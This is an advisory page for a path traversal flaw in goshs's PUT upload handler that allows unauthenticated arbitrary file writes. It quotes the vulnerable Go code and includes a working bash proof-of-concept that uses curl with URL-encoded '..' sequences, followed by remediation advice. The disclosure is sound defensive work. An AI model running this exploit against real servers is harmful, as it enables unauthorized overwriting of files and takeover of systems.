EUVD-2026-19488
GHSA-g8mv-vp7j-qp64
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
4Tags
Description
### Summary * PUT upload has no path sanitization | `httpserver/updown.go:20-69` This finding affects the default configuration, no flags or authentication required. ### Details **File:** `httpserver/updown.go:20-69` **Trigger:** `PUT /<path>` (server.go:57-59 routes directly to `put()`) The handler uses `req.URL.Path` raw to build the save path. No `filepath.Clean`, no `..` check, no webroot containment. ```go func (fs *FileServer) put(w http.ResponseWriter, req *http.Request) { upath := req.URL.Path // unsanitized filename := strings.Split(upath, "/") outName := filename[len(filename)-1] targetpath := strings.Split(upath, "/") targetpath = targetpath[:len(targetpath)-1] target := strings.Join(targetpath, "/") savepath := fmt.Sprintf("%s%s/%s", fs.UploadFolder, target, outName) // ... os.Create(savepath) // arbitrary path write ``` `UploadFolder` defaults to `Webroot` (main.go:386-388). The path is pure string concatenation with no validation. **Impact:** Unauthenticated arbitrary file write anywhere on the filesystem. **PoCs:** ```bash #!/usr/bin/env bash # Write an arbitrary file on a running goshs instance via PUT. # # Usage: ./arbitrary_overwrite1.sh <host> <port> <local-file> <absolute-target-path> set -euo pipefail HOST="${1:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}" PORT="${2:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}" LOCAL_FILE="${3:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}" TARGET="${4:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}" if [ ! -f "$LOCAL_FILE" ]; then echo "[-] Local file not found: $LOCAL_FILE" exit 1 fi # 16 levels of %2e%2e/ (URL-encoded "..") to reach filesystem root. # Encoding is required so curl does not resolve the traversal client-side. TRAVERSAL="" for _ in $(seq 1 16); do TRAVERSAL="${TRAVERSAL}%2e%2e/" done # Strip leading / from target TARGET_REL="${TARGET#/}" PUT_PATH="/${TRAVERSAL}${TARGET_REL}" echo "[*] Source: ${LOCAL_FILE}" echo "[*] Target: ${TARGET}" echo "[*] PUT: ${PUT_PATH}" echo "" HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" \ --path-as-is \ -X PUT --data-binary "@${LOCAL_FILE}" \ "http://${HOST}:${PORT}${PUT_PATH}") echo "[*] HTTP ${HTTP_CODE}" echo "[*] File should now exist at ${TARGET} on the target." ``` To execute it: `./arbitrary_overwrite2.sh 10.1.2.2 8000 ./canary /tmp/can` ## Recommendations Checking that the targeted file is part of the webroot could prevent these attacks. Also, ensure that the method `return` is called after every error response.
Analysis
Arbitrary file write in goshs HTTP server allows unauthenticated remote attackers to overwrite any file on the target system via path traversal in PUT requests. The PUT upload handler in goshs (a Go-based simple HTTP server) performs no path sanitization on user-supplied URL paths, enabling direct filesystem access outside the intended webroot through URL-encoded directory traversal sequences (%2e%2e/). …
Sign in for full analysis, threat intelligence, and remediation guidance.
Remediation
Within 24 hours: Identify all goshs instances in production using network scanning and asset inventory; disable or restrict network access to goshs services pending remediation. Within 7 days: Apply vendor-released patch to all affected goshs instances and validate deployment. …
Sign in for detailed remediation steps.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today